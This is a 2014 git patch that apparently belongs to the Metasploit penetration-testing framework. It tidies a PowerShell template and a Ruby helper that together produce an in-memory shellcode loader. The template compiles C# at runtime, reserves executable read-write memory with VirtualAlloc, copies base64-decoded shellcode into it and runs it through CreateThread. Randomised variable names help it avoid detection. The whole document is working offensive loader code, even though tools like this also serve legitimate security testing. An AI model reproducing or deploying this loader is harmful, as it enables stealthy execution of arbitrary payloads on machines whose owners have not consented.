From 1f9b452425840018d9f23488b833e8a3d793c844 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sun, 9 Feb 2014 11:23:39 +0000 Subject: [PATCH] Dont tidy up template yet --- .../scripts/to_mem_dotnet.ps1.template | 48 +++++++++++-------- lib/msf/util/exe.rb | 3 +- 2 files changed, 29 insertions(+), 22 deletions(-) diff --git a/data/templates/scripts/to_mem_dotnet.ps1.template b/data/templates/scripts/to_mem_dotnet.ps1.template index 236de4564e..3641ac94ef 100644 --- a/data/templates/scripts/to_mem_dotnet.ps1.template +++ b/data/templates/scripts/to_mem_dotnet.ps1.template @@ -1,24 +1,30 @@ Set-StrictMode -Version 2 $%{var_syscode} = @" -using System; -using System.Runtime.InteropServices; -namespace %{var_kernel32} { -public class func { -[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d); -[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr e,uint f,IntPtr g,IntPtr h,uint i,IntPtr j); -[DllImport("kernel32.dll")]public static extern int WaitForSingleObject(IntPtr k,int l); -} -} + using System; + using System.Runtime.InteropServices; + namespace %{var_kernel32} { + public class func { + [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } + [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 } + [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF } + [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); + [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); + [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds); + } + } "@ -$%{var_codeProvider}=New-Object Microsoft.CSharp.CSharpCodeProvider -$%{var_compileParams}=New-Object System.CodeDom.Compiler.CompilerParameters -$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll",[PsObject].Assembly.Location)) -$%{var_compileParams}.GenerateInMemory=$True -$%{var_output}=$%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams},$%{var_syscode}) -[Byte[]]$%{var_code}=[System.Convert]::FromBase64String("%{b64shellcode}") -$%{var_baseaddr}=[%{var_kernel32}.func]::VirtualAlloc(0,$%{var_code}.Length+1,0x3000,0x40) -if([Bool]!$%{var_baseaddr}){$global:result=3;return} -[System.Runtime.InteropServices.Marshal]::Copy($%{var_code},0,$%{var_baseaddr},$%{var_code}.Length) -[IntPtr] $%{var_threadHandle}=[%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0) -if([Bool]!$%{var_threadHandle}){$global:result=7;return} -[%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle},0xFFFFFFFF) + +$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider +$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters +$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) +$%{var_compileParams}.GenerateInMemory = $True +$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode}) + +[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}") + +$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite) +if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return } +[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length) +[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0) +if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return } +$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite) diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb index f56945c408..cdf83fb26a 100644 --- a/lib/msf/util/exe.rb +++ b/lib/msf/util/exe.rb @@ -884,7 +884,7 @@ def self.to_vba(framework,code,opts={}) hash_sub = rig.to_h hash_sub[:shellcode] = Rex::Text.to_csharp(code, 100, rig[:var_bytearray]) - + return read_replace_script_template("to_mem.aspx.template", hash_sub) end @@ -898,6 +898,7 @@ def self.to_vba(framework,code,opts={}) rig.init_var(:var_codeProvider) rig.init_var(:var_compileParams) rig.init_var(:var_syscode) + rig.init_var(:var_temp) hash_sub = rig.to_h hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)